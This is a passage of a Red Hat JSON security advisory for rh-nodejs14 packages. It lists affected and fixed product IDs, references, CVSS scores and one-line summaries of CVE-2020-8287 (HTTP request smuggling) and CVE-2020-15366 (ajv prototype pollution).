"7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8287" }, { "category": "external", "summary": "RHBZ#1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8287", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8287" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T17:20:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0421" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: HTTP request smuggling via two copies of a header field in an http request" }, { "cve": "CVE-2020-15366", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2020-07-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1857977" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ajv. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function", "title": "Vulnerability summary" }, { "category": "other", "text": "In both OpenShift Container Platform (OCP) and OpenShift ServiceMesh (OSSM), the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-ajv library to authenticated users only, therefore the impact is low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-15366" }, { "category": "external", "summary": "RHBZ#1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-15366", "url": "https://www.cve.org/CVERecord?id=CVE-2020-15366" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-AJV-584908", "url": "https://snyk.io/vuln/SNYK-JS-AJV-584908" } ], "release_date": "2020-07-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T17:20:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", 